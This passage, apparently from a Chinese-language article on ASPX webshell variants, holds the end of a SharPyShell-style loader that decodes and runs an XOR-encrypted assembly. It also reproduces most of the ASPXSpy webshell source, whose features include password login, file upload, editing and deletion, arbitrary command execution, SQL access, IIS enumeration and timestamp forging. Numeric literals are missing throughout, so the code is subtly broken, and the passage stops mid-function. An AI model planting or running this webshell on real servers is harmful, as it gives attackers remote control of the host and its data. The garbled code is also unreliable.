31,0x64,0x32,0x34,0x36,0x62,0x39,0x38,0x65,0x62,0x63,0x39,0x36,0x62,0x65,0x37,0x61,0x37,0x33,0x32,0x33,0x32,0x33,0x65,0x65,0x65,0x33,0x39,0x64,0x39,0x32,0x34,0x30,0x30,0x36,0x65,0x65,0x31,0x64,0x34,0x32,0x61,0x39,0x37,0x39,0x38,0x62,0x39,0x39,0x64,0x34,0x61,0x66,0x63,0x65,0x63,0x39,0x39,0x39,0x35,0x65,0x34,0x37,0x61,0x31,0x64,0x32,0x34,0x36,0x62,0x39,0x38,0x65,0x62,0x63,0x39,0x36,0x62,0x65,0x37,0x61,0x37,0x33,0x32,0x33,0x32,0x33,0x65,0x65,0x65,0x33,0x39,0x64,0x39,0x32,0x34,0x30,0x30,0x36,0x65,0x65,0x31,0x64,0x34,0x32,0x61,0x39,0x37,0x39,0x38,0x62,0x39,0x39,0x64,0x34,0x61,0x66,0x63,0x65,0x63,0x39,0x39,0x39,0x35,0x65,0x34,0x37,0x61,0x31,0x64,0x32,0x34,0x36,0x62,0x39,0x38,0x65,0x62,0x63,0x39,0x36,0x62,0x65,0x37,0x61,0x37,0x33,0x32,0x33,0x32,0x33,0x65,0x65,0x65,0x33,0x39,0x64,0x39,0x32,0x34,0x30,0x30,0x36,0x65,0x65,0x31,0x64,0x34,0x32,0x61,0x39,0x37,0x39,0x38,0x62,0x39,0x39,0x64,0x34,0x61,0x66,0x63,0x65,0x63,0x39,0x39,0x39,0x35,0x65,0x34,0x37,0x61,0x31,0x64,0x32,0x34,0x36,0x62,0x39,0x38,0x65,0x62,0x63,0x39,0x36,0x62,0x65,0x37,0x61,0x37,0x33,0x32,0x33,0x32,0x33,0x65,0x65,0x65,0x33,0x39,0x64,0x39,0x32,0x34,0x30,0x30,0x36,0x65,0x65,0x31,0x64,0x34,0x32,0x61,0x39,0x37,0x39,0x38,0x62,0x39,0x39,0x64,0x34,0x61,0x66,0x63,0x65,0x63,0x39,0x39,0x39,0x35,0x65,0x34,0x37,0x61,0x31,0x64,0x32,0x34,0x36,0x62,0x39,0x38,0x65,0x62,0x63,0x39,0x36,0x62,0x65,0x37,0x61,0x37,0x33,0x32,0x33,0x32,0x33,0x65,0x65,0x65,0x33,0x39,0x64,0x39,0x32,0x34,0x30,0x30,0x36,0x65,0x65,0x31,0x64,0x34,0x32,0x61,0x39,0x37,0x39,0x38,0x62,0x39,0x39,0x64,0x34,0x61,0x66,0x63,0x65,0x63,0x39,0x39,0x39,0x35,0x65,0x34,0x37,0x61,0x31,0x64,0x32,0x34,0x36,0x62,0x39,0x38,0x65,0x62,0x63,0x39,0x36,0x62,0x65,0x37,0x61,0x37,0x33,0x32,0x33,0x32,0x33,0x65,0x65,0x65,0x33,0x39,0x64,0x39,0x32,0x34,0x30,0x30,0x36,0x65,0x65,0x31,0x64,0x34,0x32,0x61,0x39,0x37,0x39,0x38,0x62,0x39,0x39,0x64,0x34,0x61,0x66,0x63,0x65,0x63,0x39,0x39,0x39,0x35,0x65,0x34,0x37,0x61,0x31,0x64,0x32,0x34,0x36,0x62,0x39,0x38,0x65,0x62,0x63,0x39,0x36,0x62,0x65,0x37,0x61,0x37,0x33,0x32,0x33,0x32,0x33,0x65,0x65,0x65,0x33,0x39,0x64,0x39,0x32,0x34,0x30,0x30,0x36,0x65,0x65,0x31,0x64};
for(int i = ; i < a.Length; i++) a[i] ^= (byte)p[i % p.Length];
Assembly aS = Assembly.Load(a);
object o = aS.CreateInstance("SharPy");
MethodInfo mi = o.GetType().GetMethod("Run");
object[] iN = new object[] {r, p};
object oU = mi.Invoke(o, iN);
Response.Write(oU);
} </script>
Relevant Link:
https://www.freebuf.com/sectool/198286.html
https://github.com/antonioCoco/SharPyShell
4. ASPX WEBSHELL变形方式
对于ASPX.NET C# WEBSHELL来说,变形的方式较少,大多属于功能齐全的大马
0x1: aspxspy.aspx
<%@ Page Language="C#" Debug="true" trace="false" validateRequest="false" %>
<%@ import Namespace="System.IO" %>
<%@ import Namespace="System.Diagnostics" %>
<%@ import Namespace="System.Data" %>
<%@ import Namespace="System.Data.OleDb" %>
<%@ import Namespace="Microsoft.Win32" %>
<%@ import Namespace="System.Net.Sockets" %>
<%@ Assembly Name="System.DirectoryServices, Version=2.0.0.0, Culture=neutral, PublicKeyToken=B03F5F7F11D50A3A" %>
<%@ import Namespace="System.DirectoryServices" %>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <script runat="server">
/*
Thanks Snailsor,FuYu Code by Bin Make in China Blog: http://www.rootkit.net.cn E-mail : master@rootkit.net.cn
*/
public string Password = "21232f297a57a5a743894a0e4a801fc3";//PASS:admin
public string SessionName = "ASPXSpy";
public string Bin_Action = "";
public string Bin_Request = "";
protected OleDbConnection conn = new OleDbConnection();
protected OleDbCommand comm = new OleDbCommand(); protected void Page_Load(object sender, EventArgs e)
{ if (Session[SessionName] != "BIN")
{
Bin_login();
}
else
{
if (!IsPostBack)
{
Bin_main();
}
else
{ Bin_Action = Request["goaction"];
if (Bin_Action == "del")
{
Bin_Request = Request["todo"];
Bin_Filedel(Bin_Request, );
}
if (Bin_Action == "change")
{
Bin_Request = Request["todo"];
Bin_FileList(Bin_Request);
}
if (Bin_Action == "deldir")
{
Bin_Request = Request["todo"];
Bin_Filedel(Bin_Request, );
}
if (Bin_Action == "down")
{
Bin_Request = Request["todo"];
Bin_Filedown(Bin_Request);
}
if (Bin_Action == "rename")
{
Bin_Request = Request["todo"];
Bin_FileRN(Bin_Request, );
}
if (Bin_Action == "renamedir")
{
Bin_Request = Request["todo"];
Bin_FileRN(Bin_Request, );
}
if (Bin_Action == "showatt")
{
Bin_Request = Request["todo"];
Bin_Fileatt(Bin_Request);
}
if (Bin_Action == "edit")
{
Bin_Request = Request["todo"];
Bin_FileEdit(Bin_Request);
}
if (Bin_Action == "postdata")
{ Bin_Request = Request["todo"];
Session["Bin_Table"] = Bin_Request;
Bin_DataGrid.CurrentPageIndex = ;
Bin_DBstrTextBox.Text = "";
Bin_Databind();
}
if (Bin_Action == "changedata")
{
Session["Bin_Table"] = null;
Bin_Request = Request["todo"];
Session["Bin_Option"] = Request["intext"];
Bin_Change();
Bin_DBinfoLabel.Visible = false;
Bin_DBstrTextBox.Text = Bin_Request; }
if (Session["Bin_Table"] != null)
{
Bin_Databind();
} }
}
}
public void Bin_login()
{
Bin_LoginPanel.Visible = true;
Bin_MainPanel.Visible = false;
Bin_MenuPanel.Visible = false;
Bin_FilePanel.Visible = false;
Bin_CmdPanel.Visible = false;
Bin_SQLPanel.Visible = false;
Bin_SuPanel.Visible = false;
Bin_IISPanel.Visible = false;
Bin_PortPanel.Visible = false;
Bin_RegPanel.Visible = false;
}
public void Bin_main()
{
TimeLabel.Text = DateTime.Now.ToString();
Bin_PortPanel.Visible = false;
Bin_RegPanel.Visible = false;
Bin_LoginPanel.Visible = false;
Bin_MainPanel.Visible = true;
Bin_MenuPanel.Visible = true;
Bin_FilePanel.Visible = false;
Bin_CmdPanel.Visible = false;
Bin_SQLPanel.Visible = false;
Bin_SuPanel.Visible = false;
Bin_IISPanel.Visible = false;
string ServerIP = "Server IP : "+Request.ServerVariables["LOCAL_ADDR"]+"<br>";
string HostName = "HostName : " + Environment.MachineName + "<br>";
string OS = "OS Version : " + Environment.OSVersion + "</br>";
string IISversion = "IIS Version : " + Request.ServerVariables["SERVER_SOFTWARE"] + "<br>";
string PATH_INFO = "PATH_TRANSLATED : " + Request.ServerVariables["PATH_TRANSLATED"] + "<br>";
InfoLabel.Text = "<hr><center><b><U>SYS-INFO</U></B></center>";
InfoLabel.Text += ServerIP + HostName + OS + IISversion + PATH_INFO + "<hr>";
InfoLabel.Text += Bin_Process() + "<hr>"; }
private bool CheckIsNumber(string sSrc)
{
System.Text.RegularExpressions.Regex reg = new System.Text.RegularExpressions.Regex(@"^0|[0-9]*[1-9][0-9]*$"); if (reg.IsMatch(sSrc))
{
return true;
}
else
{
return false;
}
}
public string Bin_iisinfo()
{
string iisinfo = "";
string iisstart = "";
string iisend = "";
string iisstr = "IIS://localhost/W3SVC";
int i = ;
try
{
DirectoryEntry mydir = new DirectoryEntry(iisstr);
iisstart = "<input type=hidden name=goaction><input type=hidden name=todo><TABLE width=100% align=center border=0><TR align=center><TD width=6%><B>Order</B></TD><TD width=20%><B>IIS_USER</B></TD><TD width=25%><B>Domain</B></TD><TD width=30%><B>Path</B></TD></TR>";
foreach (DirectoryEntry child in mydir.Children)
{
if (CheckIsNumber(child.Name.ToString()))
{
string dirstr = child.Name.ToString();
string tmpstr = "";
DirectoryEntry newdir = new DirectoryEntry(iisstr + "/" + dirstr);
DirectoryEntry newdir1 = newdir.Children.Find("root", "IIsWebVirtualDir");
iisinfo += "<TR><TD align=center>" + (i = i + ) + "</TD>";
iisinfo += "<TD align=center>" + newdir1.Properties["AnonymousUserName"].Value + "</TD>";
iisinfo += "<TD>" + child.Properties["ServerBindings"][] + "</TD>";
iisinfo += "<TD><a href=javascript:Command('change','" + formatpath(newdir1.Properties["Path"].Value.ToString()) + "');>" + newdir1.Properties["Path"].Value + "</a></TD>";
iisinfo += "</TR>";
}
}
iisend = "</TABLE><hr>";
}
catch (Exception error)
{
Bin_Error(error.Message);
}
return iisstart + iisinfo + iisend;
}
public string Bin_Process()
{
string htmlstr = "<center><b><U>PROCESS-INFO</U></B></center><TABLE width=80% align=center border=0><TR align=center><TD width=20%><B>ID</B></TD><TD align=left width=20%><B>Process</B></TD><TD align=left width=20%><B>MemorySize</B></TD><TD align=center width=10%><B>Threads</B></TD></TR>";
string prostr = "";
string htmlend = "</TR></TABLE>";
try
{
Process[] myprocess = Process.GetProcesses();
foreach (Process p in myprocess)
{
prostr += "<TR><TD align=center>" + p.Id.ToString() + "</TD>";
prostr += "<TD align=left>" + p.ProcessName.ToString() + "</TD>";
prostr += "<TD align=left>" + p.WorkingSet.ToString() + "</TD>";
prostr += "<TD align=center>" + p.Threads.Count.ToString() + "</TD>";
}
}
catch (Exception Error)
{
Bin_Error(Error.Message);
}
return htmlstr + prostr + htmlend;
}
protected void LoginButton_Click(object sender, EventArgs e)
{
string MD5Pass = FormsAuthentication.HashPasswordForStoringInConfigFile(passtext.Text,"MD5").ToLower();
if (MD5Pass == Password)
{
Session[SessionName] = "BIN";
Bin_main();
}
else
{
Bin_login();
}
} protected void LogoutButton_Click(object sender, EventArgs e)
{
Session.Abandon();
Bin_login();
} protected void FileButton_Click(object sender, EventArgs e)
{
Bin_LoginPanel.Visible = false;
Bin_MenuPanel.Visible = true;
Bin_MainPanel.Visible = false;
Bin_FilePanel.Visible = true;
Bin_CmdPanel.Visible = false;
Bin_SQLPanel.Visible = false;
Bin_SuPanel.Visible = false;
Bin_IISPanel.Visible = false;
Bin_PortPanel.Visible = false;
Bin_RegPanel.Visible = false;
Bin_upTextBox.Text = formatpath(Server.MapPath("."));
Bin_CopyTextBox.Text = formatpath(Server.MapPath("."));
Bin_upTextBox.Text = formatpath(Server.MapPath("."));
Bin_FileList(Server.MapPath(".")); } protected void MainButton_Click(object sender, EventArgs e)
{
Bin_main();
}
public void Bin_DriveList()
{
string file = "<input type=hidden name=goaction><input type=hidden name=todo>";
file += "<hr>Drives : ";
string[] drivers = Directory.GetLogicalDrives();
for (int i = ; i < drivers.Length; i++)
{
file += "<a href=javascript:Command('change','" + formatpath(drivers[i]) + "');>" + drivers[i] + "</a> ";
}
file += " WebRoot : <a href=javascript:Command('change','" + formatpath(Server.MapPath(".")) + "');>" + Server.MapPath(".") + "</a>";
Bin_FileLabel.Text = file;
} public void Bin_FileList(string Bin_path)
{
Bin_FilePanel.Visible = true;
Bin_CreateTextBox.Text = "";
Bin_CopytoTextBox.Text = "";
Bin_CopyTextBox.Text = Bin_path;
Bin_upTextBox.Text = Bin_path;
Bin_IISPanel.Visible = false;
Bin_DriveList();
string tmpstr="";
string Bin_Filelist = Bin_FilelistLabel.Text;
Bin_Filelist = "<hr>";
Bin_Filelist += "<table width=90% border=0 align=center>";
Bin_Filelist += "<tr><td width=40%><b>Name</b></td><td width=15%><b>Size(Byte)</b></td>";
Bin_Filelist += "<td width=25%><b>ModifyTime</b></td><td width=25%><b>Operate</b></td></tr>";
try
{
Bin_Filelist += "<tr><td>";
string parstr = "";
if (Bin_path.Length < )
{
parstr = formatpath(Bin_path); }
else
{
parstr = formatpath(Directory.GetParent(Bin_path).ToString()); }
Bin_Filelist += "<i><b><a href=javascript:Command('change','" + parstr + "');>|Parent Directory|</a></b></i>";
Bin_Filelist += "</td></tr>"; DirectoryInfo Bin_dir = new DirectoryInfo(Bin_path);
foreach (DirectoryInfo Bin_folder in Bin_dir.GetDirectories())
{
string foldername = formatpath(Bin_path) + "/" + formatfile(Bin_folder.Name);
tmpstr += "<tr>";
tmpstr += "<td><a href=javascript:Command('change','" + foldername + "')>" + Bin_folder.Name + "</a></td><td><b><i><dir></i></b></td><td>" + Directory.GetLastWriteTime(Bin_path + "/" + Bin_folder.Name) + "</td><td><a href=javascript:Command('renamedir','" + foldername + "');>Ren</a>|<a href=javascript:Command('showatt','" + foldername + "/');>Att</a>|<a href=javascript:Command('deldir','" + foldername + "');>Del</a></td>";
tmpstr += "</tr>";
}
foreach (FileInfo Bin_file in Bin_dir.GetFiles())
{
string filename = formatpath(Bin_path) + "/" + formatfile(Bin_file.Name);
tmpstr += "<tr>";
tmpstr += "<td>" + Bin_file.Name + "</td><td>" + Bin_file.Length + "</td><td>" + Directory.GetLastWriteTime(Bin_path + "/" + Bin_file.Name) + "</td><td><a href=javascript:Command('edit','" + filename + "');>Edit</a>|<a href=javascript:Command('rename','" + filename + "');>Ren</a>|<a href=javascript:Command('down','" + filename + "');>Down</a>|<a href=javascript:Command('showatt','" + filename + "');>Att</a>|<a href=javascript:Command('del','" + filename + "');>Del</a></td>";
tmpstr += "</tr>";
}
tmpstr += "</talbe>";
}
catch (Exception Error)
{
Bin_Error(Error.Message); } Bin_FilelistLabel.Text = Bin_Filelist + tmpstr;
}
public void Bin_Filedel(string instr,int type)
{
try
{
if (type == )
{
File.Delete(instr);
}
if (type == )
{
foreach (string tmp in Directory.GetFileSystemEntries(instr))
{
if (File.Exists(tmp))
{
File.Delete(tmp);
}
else
{
Bin_Filedel(tmp, );
}
}
Directory.Delete(instr);
}
}
catch (Exception Error)
{
Bin_Error(Error.Message);
}
Bin_FileList(Bin_upTextBox.Text);
}
public void Bin_FileRN(string instr,int type)
{
try
{
if (type == )
{
string[] array = instr.Split(','); File.Move(array[], array[]);
}
if (type == )
{
string[] array = instr.Split(',');
Directory.Move(array[], array[]);
}
}
catch (Exception Error)
{
Bin_Error(Error.Message);
}
Bin_FileList(Bin_upTextBox.Text);
}
public void Bin_Filedown(string instr)
{
try
{
FileStream MyFileStream = new FileStream(instr, FileMode.Open, FileAccess.Read, FileShare.Read);
long FileSize = MyFileStream.Length;
byte[] Buffer = new byte[(int)FileSize];
MyFileStream.Read(Buffer, , (int)FileSize);
MyFileStream.Close();
Response.AddHeader("Content-Disposition", "attachment;filename=" + instr);
Response.Charset = "UTF-8";
Response.ContentType = "application/octet-stream";
Response.BinaryWrite(Buffer);
Response.Flush();
Response.End();
}
catch (Exception Error)
{
Bin_Error(Error.Message);
} }
public void Bin_Fileatt(string instr)
{
Bin_AttPanel.Visible = true;
Bin_FilePanel.Visible = true;
try
{
string Att = File.GetAttributes(instr).ToString();
Bin_ReadOnlyCheckBox.Checked = false;
Bin_SystemCheckBox.Checked = false;
Bin_HiddenCheckBox.Checked = false;
Bin_ArchiveCheckBox.Checked = false; if (Att.LastIndexOf("ReadOnly") != -)
{
Bin_ReadOnlyCheckBox.Checked = true;
}
if (Att.LastIndexOf("System") != -)
{
Bin_SystemCheckBox.Checked = true;
}
if (Att.LastIndexOf("Hidden") != -)
{
Bin_HiddenCheckBox.Checked = true;
}
if (Att.LastIndexOf("Archive") != -)
{
Bin_ArchiveCheckBox.Checked = true;
}
Bin_CreationTimeTextBox.Text = File.GetCreationTime(instr).ToString();
Bin_LastWriteTimeTextBox.Text = File.GetLastWriteTime(instr).ToString();
Bin_AccessTimeTextBox.Text = File.GetLastAccessTime(instr).ToString();
}
catch (Exception Error)
{
Bin_Error(Error.Message);
}
Bin_AttLabel.Text = instr;
Session["FileName"] = instr;
Bin_DriveList();
}
public void Bin_FileEdit(string instr)
{
Bin_FilePanel.Visible = true;
Bin_EditPanel.Visible = true;
Bin_DriveList();
Bin_EditpathTextBox.Text = instr;
StreamReader SR = new StreamReader(instr, Encoding.Default);
Bin_EditTextBox.Text = SR.ReadToEnd();
SR.Close();
}
protected void Bin_upButton_Click(object sender, EventArgs e)
{ string uppath = Bin_upTextBox.Text;
if (uppath.Substring(uppath.Length - , ) != @"/")
{
uppath = uppath + @"/";
}
try
{
Bin_UpFile.PostedFile.SaveAs(uppath + Path.GetFileName(Bin_UpFile.Value)); }
catch (Exception error)
{
Bin_Error(error.Message);
}
Bin_FileList(uppath);
}
public void Bin_Error(string error)
{
Bin_ErrorLabel.Text = "Error : " + error;
}
public string formatpath(string instr)
{
instr = instr.Replace(@"\", "/");
if (instr.Length < )
{
instr = instr.Replace(@"/", "");
}
if (instr.Length == )
{
instr = instr + @"/";
}
instr = instr.Replace(" ", "%20");
return instr;
}
public string formatfile(string instr)
{
instr = instr.Replace(" ", "%20");
return instr; }
protected void Bin_GoButton_Click(object sender, EventArgs e)
{
Bin_FileList(Bin_upTextBox.Text);
} protected void Bin_NewFileButton_Click(object sender, EventArgs e)
{
string newfile = Bin_CreateTextBox.Text;
string filepath = Bin_upTextBox.Text;
filepath = filepath + "/" + newfile;
try
{
StreamWriter sw = new StreamWriter(filepath, true, Encoding.Default); }
catch (Exception Error)
{
Bin_Error(Error.Message);
}
Bin_FileList(Bin_upTextBox.Text);
} protected void Bin_NewdirButton_Click(object sender, EventArgs e)
{
string dirpath = Bin_upTextBox.Text;
string newdir = Bin_CreateTextBox.Text;
newdir = dirpath + "/" + newdir;
try
{
Directory.CreateDirectory(newdir); }
catch(Exception Error)
{
Bin_Error(Error.Message);
}
Bin_FileList(Bin_upTextBox.Text);
} protected void Bin_CopyButton_Click(object sender, EventArgs e)
{
string copystr = Bin_CopyTextBox.Text;
string copyto = Bin_CopytoTextBox.Text;
try
{
File.Copy(copystr, copyto);
}
catch (Exception Error)
{
Bin_Error(Error.Message);
}
Bin_CopytoTextBox.Text = "";
Bin_FileList(Bin_upTextBox.Text);
} protected void Bin_CutButton_Click(object sender, EventArgs e)
{
string copystr = Bin_CopyTextBox.Text;
string copyto = Bin_CopytoTextBox.Text;
try
{
File.Move(copystr, copyto);
}
catch (Exception Error)
{
Bin_Error(Error.Message);
}
Bin_CopytoTextBox.Text = "";
Bin_FileList(Bin_upTextBox.Text);
} protected void Bin_SetButton_Click(object sender, EventArgs e)
{
try
{
string FileName = Session["FileName"].ToString();
File.SetAttributes(FileName, FileAttributes.Normal);
if (Bin_ReadOnlyCheckBox.Checked)
{
File.SetAttributes(FileName, FileAttributes.ReadOnly);
} if (Bin_SystemCheckBox.Checked)
{
File.SetAttributes(FileName, File.GetAttributes(FileName) | FileAttributes.System);
}
if (Bin_HiddenCheckBox.Checked)
{
File.SetAttributes(FileName, File.GetAttributes(FileName) | FileAttributes.Hidden);
}
if (Bin_ArchiveCheckBox.Checked)
{
File.SetAttributes(FileName, File.GetAttributes(FileName) | FileAttributes.Archive);
}
if (FileName.Substring(FileName.Length - , ) == "/")
{
Directory.SetCreationTime(FileName, Convert.ToDateTime(Bin_CreationTimeTextBox.Text));
Directory.SetLastWriteTime(FileName, Convert.ToDateTime(Bin_LastWriteTimeTextBox.Text));
Directory.SetLastAccessTime(FileName, Convert.ToDateTime(Bin_AccessTimeTextBox.Text));
}
else
{
File.SetCreationTime(FileName, Convert.ToDateTime(Bin_CreationTimeTextBox.Text));
File.SetLastWriteTime(FileName, Convert.ToDateTime(Bin_LastWriteTimeTextBox.Text));
File.SetLastAccessTime(FileName, Convert.ToDateTime(Bin_AccessTimeTextBox.Text));
}
}
catch (Exception Error)
{
Bin_Error(Error.Message);
}
Bin_FileList(Bin_upTextBox.Text);
Response.Write("<script>alert('Success!')</sc" + "ript>");
} protected void Bin_EditButton_Click(object sender, EventArgs e)
{
try
{
StreamWriter SW = new StreamWriter(Bin_EditpathTextBox.Text, false, Encoding.Default);
SW.Write(Bin_EditTextBox.Text);
SW.Close();
}
catch (Exception Error)
{
Bin_Error(Error.Message);
}
Bin_FileList(Bin_upTextBox.Text);
Response.Write("<script>alert('Success!')</sc" + "ript>"); } protected void Bin_BackButton_Click(object sender, EventArgs e)
{
Bin_FileList(Bin_upTextBox.Text);
} protected void Bin_SbackButton_Click(object sender, EventArgs e)
{
Bin_FileList(Bin_upTextBox.Text);
} protected void Bin_CmdButton_Click(object sender, EventArgs e)
{
Bin_MenuPanel.Visible = true;
Bin_LoginPanel.Visible = false;
Bin_CmdPanel.Visible = true;
Bin_SQLPanel.Visible = false;
Bin_CmdLabel.Text = "";
Bin_SuPanel.Visible = false;
Bin_IISPanel.Visible = false;
Bin_RegPanel.Visible = false;
Bin_PortPanel.Visible = false;
} protected void Bin_RunButton_Click(object sender, EventArgs e)
{
try
{
Process Cmdpro = new Process();
Cmdpro.StartInfo.FileName = Bin_CmdPathTextBox.Text;
Cmdpro.StartInfo.Arguments = Bin_CmdShellTextBox.Text;
Cmdpro.StartInfo.UseShellExecute = false;
Cmdpro.StartInfo.RedirectStandardInput = true;
Cmdpro.StartInfo.RedirectStandardOutput = true;
Cmdpro.StartInfo.RedirectStandardError = true;
Cmdpro.Start();
string cmdstr = Cmdpro.StandardOutput.ReadToEnd();
cmdstr = cmdstr.Replace("<", "<");
cmdstr = cmdstr.Replace(">", ">");
Bin_CmdLabel.Text = "<hr><div id=\"cmd\"><pre>" + cmdstr + "</pre></div>";
}
catch (Exception Error)
{
Bin_Error(Error.Message);
}
} protected void Bin_SQLButton_Click(object sender, EventArgs e)
{
Bin_CmdPanel.Visible = false;
Bin_SQLPanel.Visible = true;
Bin_LoginPanel.Visible = false;
Bin_MenuPanel.Visible = true;
Bin_AccPanel.Visible = false;
Bin_Scroll.Visible = false;
Bin_DBmenuPanel.Visible = false;
Bin_dirPanel.Visible = false;
Bin_SuPanel.Visible = false;
Bin_IISPanel.Visible = false;
Bin_PortPanel.Visible = false;
Bin_RegPanel.Visible =false;
} protected void Bin_SQLRadioButton_CheckedChanged(object sender, EventArgs e)
{
Session["Bin_Table"] = null;
Bin_SQLconnTextBox.Text = "server=localhost;UID=sa;PWD=;database=master;Provider=SQLOLEDB";
Bin_SQLRadioButton.Checked = true;
Bin_AccRadioButton.Checked = false;
Bin_AccPanel.Visible = false;
Bin_DataGrid.Visible = false;
Bin_Scroll.Visible = false;
Bin_DBmenuPanel.Visible = false;
Bin_dirPanel.Visible = false;
} protected void Bin_AccRadioButton_CheckedChanged(object sender, EventArgs e)
{
Session["Bin_Table"] = null;
Bin_SQLconnTextBox.Text = @"Provider=Microsoft.Jet.OLEDB.4.0;Data Source=E:\wwwroot\database.mdb";
Bin_SQLRadioButton.Checked = false;
Bin_AccRadioButton.Checked = true;
Bin_DBmenuPanel.Visible = false;
Bin_AccPanel.Visible = false;
Bin_DataGrid.Visible = false;
Bin_Scroll.Visible = false;
Bin_dirPanel.Visible = false; }
protected void OpenConnection()
{
if (conn.State == ConnectionState.Closed)
{
try
{
conn.ConnectionString = Bin_SQLconnTextBox.Text;
comm.Connection = conn;
conn.Open();
}
catch (Exception Error)
{
Bin_Error(Error.Message);
}
}
}
protected void CloseConnection()
{
if (conn.State == ConnectionState.Open)
conn.Close();
conn.Dispose();
comm.Dispose();
}
public DataTable Bin_DataTable(string sqlstr)
{
OleDbDataAdapter da = new OleDbDataAdapter();
DataTable datatable = new DataTable();
try
{
OpenConnection();
comm.CommandType = CommandType.Text;
comm.CommandText = sqlstr;
da.SelectCommand = comm;
da.Fill(datatable);
}
catch (Exception)
{
}
finally
{
CloseConnection();
}
return datatable;
}
protected void SQL_SumbitButton_Click(object sender, EventArgs e)
{
try
{
Session["Bin_Table"] = null;
Bin_DataGrid.CurrentPageIndex = ;
Bin_DataGrid.AllowPaging = true;
if (Bin_SQLRadioButton.Checked)
{
Bin_DBmenuPanel.Visible = true;
Bin_DBinfoLabel.Visible = true;
Bin_AccPanel.Visible = false;
Bin_Scroll.Visible = false;
Bin_dirPanel.Visible = false;
OpenConnection();
DataTable ver = Bin_DataTable(@"SELECT @@VERSION");
DataTable dbs = Bin_DataTable(@"SELECT name FROM master.dbo.sysdatabases");
DataTable cdb = Bin_DataTable(@"SELECT DB_NAME()");
DataTable rol = Bin_DataTable(@"SELECT IS_SRVROLEMEMBER('sysadmin')");
DataTable owner = Bin_DataTable(@"SELECT IS_MEMBER('db_owner')");
string dbo = "";
if (owner.Rows[][].ToString() == "")
{
dbo = "db_owner";
}
else
{
dbo = "public";
}
if (rol.Rows[][].ToString() == "")
{
dbo = "<font color=blue>sa</font>";
}
string db_info = "";
db_info = "<i><b><font color=red>SQLversion</font> : </b></i>" + ver.Rows[][].ToString() + "<br><hr>";
string db_name = "";
for (int i = ; i < dbs.Rows.Count; i++)
{
db_name += dbs.Rows[i][].ToString().Replace(cdb.Rows[][].ToString(), "<font color=blue>" + cdb.Rows[][].ToString() + "</font>") + " | ";
}
db_info += "<i><b><font color=red>DataBase</font> : </b></i><div style=\"width:760px;word-break:break-all\">" + db_name + "<br><div><hr>";
db_info += "<i><b><font color=red>SRVROLEMEMBER</font></i></b> : " + dbo + "<hr>";
Bin_DBinfoLabel.Text = db_info;
}
if (Bin_AccRadioButton.Checked)
{
Bin_DataGrid.Visible = false;
Bin_SAexecButton.Visible = false;
Bin_Accbind();
}
}
catch (Exception E)
{
Bin_Error(E.Message);
}
}
protected void Bin_Accbind()
{
try
{
Bin_DBmenuPanel.Visible = false;
Bin_AccPanel.Visible = true;
OpenConnection();
DataTable acctable = new DataTable();
acctable = conn.GetOleDbSchemaTable(OleDbSchemaGuid.Tables, new Object[] { null, null, null, "Table" });
string accstr = "<input type=hidden name=goaction><input type=hidden name=todo>";
accstr += "Tables Count : " + acctable.Rows.Count + "<br>Please select a database : <SELECT onchange=if(this.value!='')Command('postdata',this);>";
for (int i = ; i < acctable.Rows.Count; i++)
{
accstr += "<option value=" + acctable.Rows[i].ItemArray[].ToString() + ">" + acctable.Rows[i].ItemArray[].ToString() + "</option>";
}
if (Session["Bin_Table"] != null)
{
accstr += "<option SELECTED>" + Session["Bin_Table"] + "</option>";
}
accstr += "</SELECT>";
Bin_AccinfoLabel.Text = accstr;
CloseConnection();
}
catch (Exception Error)
{
Bin_Error(Error.Message);
}
}
protected void Bin_Databind()
{
try
{
Bin_SAexecButton.Visible = false;
Bin_Accbind();
Bin_Scroll.Visible = true;
if (Bin_SQLRadioButton.Checked)
{
Bin_DBmenuPanel.Visible = true;
Bin_DBinfoLabel.Visible = false;
}
Bin_DataGrid.Visible = true;
DataTable databind = Bin_DataTable(@"SELECT * FROM " + Session["Bin_Table"]);
Bin_DataGrid.DataSource = databind;
Bin_DataGrid.DataBind();
}
catch (Exception Error)
{ Bin_Error(Error.Message);
}
} public void Bin_ExecSql(string instr)
{
try
{
OpenConnection();
comm.CommandType = CommandType.Text;
comm.CommandText = instr;
comm.ExecuteNonQuery();
}
catch (Exception e)
{
Bin_Error(e.Message);
}
}
public void Item_DataBound(object sender,DataGridItemEventArgs e)
{ for (int i = ; i < e.Item.Cells.Count; i++)
{
e.Item.Cells[i].Text = e.Item.Cells[i].Text.Replace("<", "<").Replace(">", ">");
} }
protected void Bin_DBPage(object sender, DataGridPageChangedEventArgs e)
{
Bin_DataGrid.CurrentPageIndex = e.NewPageIndex;
Bin_Databind();
}
public void Item_Command(object sender, DataGridCommandEventArgs e)
{
if (e.CommandName == "Cancel")
{
Bin_DataGrid.EditItemIndex = -;
Bin_Databind();
}
} protected void Bin_ExecButton_Click(object sender, EventArgs e)
{
try
{ Bin_Scroll.Visible = true;
Bin_DataGrid.Visible = true;
Bin_DataGrid.AllowPaging = true;
Bin_Accbind();
if (Bin_SQLRadioButton.Checked)
{
Bin_DBmenuPanel.Visible = true;
}
string sqlstr = Bin_DBstrTextBox.Text;
sqlstr = sqlstr.TrimStart().ToLower();
if (sqlstr.Substring(, ) == "select")
{
DataTable databind = Bin_DataTable(sqlstr);
Bin_DataGrid.DataSource = databind;
Bin_DataGrid.DataBind();
}
else
{
Bin_ExecSql(sqlstr);
Bin_Databind();
}
}
catch(Exception error)
{
Bin_Error(error.Message);
}
} protected void Bin_BDButton_Click(object sender, EventArgs e)
{
Bin_DBinfoLabel.Visible = false;
Bin_Accbind();
Bin_DBmenuPanel.Visible = true;
Bin_DataGrid.Visible = false;
Bin_DataGrid.AllowPaging = true;
Bin_Scroll.Visible = false;
Bin_DBstrTextBox.Text = "";
Bin_SAexecButton.Visible = false;
Bin_ResLabel.Visible = false;
Bin_dirPanel.Visible = false; } protected void Bin_SACMDButton_Click(object sender, EventArgs e)
{
Bin_DBinfoLabel.Visible = false;
Bin_DataGrid.Visible = false;
Bin_Scroll.Visible = false;
Bin_SAexecButton.Visible = true;
Bin_Change();
Bin_ExecButton.Visible = false;
Bin_ResLabel.Visible = false;
Session["Bin_Option"] = null;
Bin_dirPanel.Visible = false; }
public void Bin_Change()
{
Bin_ExecButton.Visible = false;
